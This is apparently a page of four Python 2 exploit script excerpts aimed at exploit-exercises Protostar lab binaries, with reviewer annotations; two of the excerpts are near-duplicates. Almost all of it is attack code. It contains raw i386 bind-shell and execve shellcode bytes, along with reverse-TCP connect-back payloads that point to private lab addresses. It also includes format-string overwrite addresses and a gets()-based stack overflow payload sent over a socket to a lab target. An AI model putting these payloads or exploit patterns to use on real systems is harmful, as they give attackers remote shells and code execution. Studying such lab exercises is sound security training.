Beispiel #1
#vector:
#1st chunk:
#[ FSRD | nop x 4 | nops + jmp | PPPP | nops + shellcode + / ]
#                                                            |
#                                                            |
#2nd chunk:                                                  |
#[ FSRD | ROOT | / + \xfc\xff\xff\xff +                      |
#                    \xfc\xff\xff\xff +                      |
#                    \x10\xd4\x04\x08 +                      |
#                    \x10\xe0\x04\x08 + \x00 | P A D D I N G ]
#                                                            |
#                                                           128
#
# (The diagram above is the author's layout of two request chunks, the
#  bar on the right marking a 128-byte width; the cell names FSRD, PPPP
#  and ROOT are the author's shorthand and are not defined on this page.)
#
# NOTE(review): Python 2 script (print statements, str used as bytes).
# `shellgen`, `socket`, `AF_INET` and `SOCK_STREAM` are used unqualified,
# so their imports live outside this excerpt; the excerpt ends right
# after the socket is created, before it is connected or closed.

# 16-byte filler matching the "nop x 4 | nops + jmp | PPPP" cells of the
# diagram: four NOPs, a two-byte short jump (\xeb\x05), one NOP, "AAAA",
# four NOPs. Not referenced anywhere in this excerpt.
chusion = '\x90\x90\x90\x90\x90\xeb\x05\x90\x41\x41\x41\x41\x90\x90\x90\x90'

# Connect-back payload produced by shellgen; the address is a private
# (RFC 1918) lab host. Only its length is used in this excerpt.
revtcp = shellgen.linux().reverse_tcp('192.168.2.52', 5555)

# Hand-written i386 bind-shell payload, 76 bytes, padded with three
# trailing NOPs. The "//sh" (\x2f\x2f\x73\x68) and "/bin" (\x2f\x62\x69\x6e)
# bytes are readable in the literal; \x66\x68\x2b\x67 looks like a pushed
# 16-bit network-order port (0x2b67 = 11111) -- worth confirming before
# relying on it for detection signatures.
bind = "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a" +\
"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68" + \
"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1" + \
"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd" + \
"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f" + \
"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f" + \
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + \
"\x41\xcd\x80\x90\x90\x90"

# Python 2 print statements: report both payload sizes (the diagram's
# 128-byte chunk width is the presumable reason for checking them).
print 'len bind: ', len(bind)

print 'len revtcp: ', len(revtcp)

# TCP client socket; never connected, used or closed within this excerpt.
s = socket(AF_INET, SOCK_STREAM)
Beispiel #2
#exploit-exercises.com : Protostar : final1
# do:
#   I stage: get control program flow.
#
#       how: format string bug through syslog( pri, my_input )
#
#       _extrn [puts] <-- username addr (shellcode be here)
#
#   II stage: load shellcode into memory.
#
#       how: simple. send as username, then login.
#
# _extrn puts   = 0x0804A194
# username      = 0x0804A220
#
# NOTE(review): the two addresses above are fixed, binary-specific
# (non-PIE, 0x0804xxxx) locations, so the approach only holds where the
# target runs without ASLR/PIE -- presumably how the Protostar lab VM is
# configured. Python 2 script; `shellgen` and `struct` are used without
# an import in this excerpt, and the excerpt ends before anything is
# built into a request or sent.

# Connect-back payload from shellgen (private RFC 1918 lab address),
# then prefixed with a 5-byte NOP sled.
revtcp = shellgen.linux().reverse_tcp('192.168.2.56', 2222)

revtcp = '\x90' * 5 + revtcp
# 3 NOPs + a 21-byte hand-written i386 execve("/bin//sh") payload: the
# "//sh" and "/bin" bytes are readable in the literal and
# \xb0\x0b ... \xcd\x80 is the execve (syscall 11) / int 0x80 sequence.
sh = '\x90' * 3 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

# Bind-shell payload on port 1234 from shellgen. "#I use it" is the
# author's note; the variable is not referenced again in this excerpt.
bind = shellgen.linux().bindport(1234)  #I use it

# Username-buffer address from the header, packed little-endian ('<I').
# The trailing note appears to record the author's plan of writing the
# value in two halves (0xa220 at 0x0804a194, 0x0804 at 0x0804a196).
retloc = struct.pack(
    '<I', 0x0804A220)  #0xa220 --> 0x0804a194 & 0x10804 --> 0x0804a196

# `_extrn puts` address from the header, packed little-endian; the
# author's note gives the resulting byte order.
putsaddr = struct.pack('<I', 0x0804A194)  # \x94\xa1\x04\x08

# Credentials are redacted on this page ('******' is a placeholder, not a
# real value); `login` carries the trailing newline the service expects.
user = '******'
login = '******' + '\n'

# Three 0xc3 bytes (0xc3 is the x86 `ret` opcode); per the name it serves
# as filler and is not referenced again in this excerpt.
padding = '\xc3' * 3
Beispiel #3
# do:
#   I stage: get control program flow.
#
#       how: format string bug through syslog( pri, my_input )
#
#       _extrn [puts] <-- username addr (shellcode be here)
#
#   II stage: load shellcode into memory.
#
#       how: simple. send as username, then login.
#
# _extrn puts   = 0x0804A194
# username      = 0x0804A220
#
# NOTE(review): this is a near-verbatim duplicate of the preceding
# Protostar final1 example (same addresses, payloads and placeholders,
# minus the `padding` line). The addresses are fixed, binary-specific
# (non-PIE) locations that only hold without ASLR/PIE. Python 2 script;
# `shellgen` and `struct` are used without an import in this excerpt,
# and the excerpt ends before anything is sent.


# Connect-back payload from shellgen (private RFC 1918 lab address),
# then prefixed with a 5-byte NOP sled.
revtcp = shellgen.linux().reverse_tcp('192.168.2.56',2222)

revtcp = '\x90'*5 + revtcp
# 3 NOPs + a 21-byte hand-written i386 execve("/bin//sh") payload
# ("//sh" and "/bin" are readable in the literal; \xb0\x0b ... \xcd\x80
# is the execve syscall 11 / int 0x80 sequence).
sh = '\x90'*3 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

# Bind-shell payload on port 1234 from shellgen; "#I use it" is the
# author's note -- the variable is not referenced again in this excerpt.
bind = shellgen.linux().bindport(1234) #I use it

# Username-buffer address from the header, packed little-endian ('<I').
# The trailing note appears to record the author's plan of writing the
# value in two halves (0xa220 at 0x0804a194, 0x0804 at 0x0804a196).
retloc = struct.pack('<I', 0x0804A220) #0xa220 --> 0x0804a194 & 0x10804 --> 0x0804a196

# `_extrn puts` address from the header, packed little-endian; the
# author's note gives the resulting byte order.
putsaddr = struct.pack('<I',0x0804A194) # \x94\xa1\x04\x08


# Credentials are redacted on this page ('******' is a placeholder, not a
# real value); `login` carries the trailing newline the service expects.
user = '******' 
login = '******' + '\n'

Beispiel #4
#   I stage:
#       overflow buff in stack through gets
#       redirect program flow to gets(my_buff) again
#       use my_buff as retaddr from gets
#
#   II stage: send shellcode
#       easy. without null-bytes ;)
#
#bss = 0x0804AE68
#data = 0x0804AE40
#printf = 0x0804987D
#gets = 0x08048AAC
#
# NOTE(review): classic gets()-based stack overflow against a fixed,
# non-PIE binary: every address above is hard-coded, so this only holds
# with ASLR/PIE off and no stack canary (presumably the lab VM's
# configuration). Python 2 script; `shellgen`, `struct`, `socket`,
# `AF_INET` and `SOCK_STREAM` are used without an import in this excerpt.
# The excerpt ends after `exp` is built -- the send, the stage-II
# transmission and the socket close are outside it.

# Filler length; presumably the byte distance from the start of the
# overflowed buffer to the saved return address -- TODO confirm against
# the binary.
junk = 532

# Connect-back payload from shellgen (private RFC 1918 lab address);
# the stage-II payload per the header, only measured in this excerpt.
rev = shellgen.linux().reverse_tcp('192.168.2.52',5555)
print 'shellcode len: ', len(rev)

print 'go'


# printf address packed little-endian; per the author's note it was used
# to verify the overflow, and it is not referenced in this excerpt.
printf = struct.pack('<I',0x0804987D) #to test owerflow

# gets() address packed little-endian: the value the saved return
# address is overwritten with (stage I, "redirect program flow to gets").
gets = struct.pack('<I',0x08048AAC)

# .data section address packed little-endian; "killall data_section" is
# the author's note that the buffer written there overwrites its contents.
data = struct.pack('<I', 0x0804AE40) #killall data_section :)

# TCP connection to the lab target; not closed within this excerpt.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.2.26', 2995))

# Stage-I line: `junk` filler bytes, the saved return address replaced
# with gets(), then `data` twice -- apparently serving as both gets()'s
# return address and its buffer argument (the header's "use my_buff as
# retaddr from gets"). Built here but not sent within this excerpt.
exp = 'A'*(junk) + gets + data + data + '\n'